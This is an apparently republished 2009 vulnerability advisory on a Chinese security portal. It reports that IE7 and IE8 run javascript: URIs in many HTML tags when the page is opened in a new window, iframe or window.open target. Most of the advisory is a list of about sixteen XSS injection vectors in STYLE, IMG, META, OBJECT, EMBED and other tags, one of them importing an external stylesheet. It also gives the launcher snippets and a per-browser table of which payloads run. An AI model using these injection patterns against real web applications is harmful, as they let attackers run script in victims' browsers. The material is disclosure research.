首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Multiple Exploiting IE8/IE7 XSS Vulnerability
来源:www.80vul.com 作者:SuperHei 发布时间:2009-06-22   
Multiple Exploiting IE8/IE7 XSS Vulnerability 

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt

Overview:

  Tags[not include <IFRAME>] in ie7/8 are don't allowe to run "javascript:[jscodz]",but 
we found them allowed ro run where open it in new target.

like this url:

http://www.80vul.com/test/ie8-1.htm

ie8-1.htm's codz :

<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<script SRC="javascript:alert('xss11');"></script>
<video SRC="javascript:alert('xss12');"</video>
<LAYER SRC="javascript:alert('xss13')"></LAYER>
<embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
<applet src="javascript:alert('xss15')" type=text/html>

when visite this url by ie7/8, <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> this is runing, but other aren't to run.
but, where open ie8-1.htm in new target[like this :<a href= target="_blank"> and <iframe> and window.open in <sript> ... etc.] ,so test this codz in my localhost:

<a href="http://www.80vul.com/test/ie8-1.htm" target="_blank">go</a>
[PS: <a href="http://www.80vul.com/test/ie8-1.htm">go</a> don't work]

of couse this codz:

<iframe src="http://www.80vul.com/test/ie8s.htm"></iframe>

and this codz:

<script>window.open("http://www.80vul.com/test/ie8-1.htm");</script>

........[testing].......

So the results is :
---------------------------------------------------------
 IE |  alert     
---------------------------------------------------------
ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
------------------------------------------------------
ie8: xss4/xss1/xss11/xss6
---------------------------------------------------------

Disclosure Timeline:

2009/05/01 - Found this Vulnerability
2009/06/22 - Public Disclosure

Greeting:

ycosxhack[http://hi.baidu.com/ycosxhack],Not his test,not this Vulnerability.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NetBSD/x86 kill all processes
·Safari on the Apple iPhone suf
·PHP version 5.2.10 has an inva
·PEEL E-Commerce suffers from a
·Safari 3.2.3 Arbitrary Code Ex
·pmaPWN! - phpMyAdmin Code Inje
·Edraw PDF Viewer Component < 3
·Multiple HTTP Server Low Bandw
·DESlock+ 4.0.2 dlpcrypt.sys Lo
·MyBB <= 1.4.6 Remote Code Exec
·compface <= 1.5.2 (XBM File) L
·Bopup Communications Server 3.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved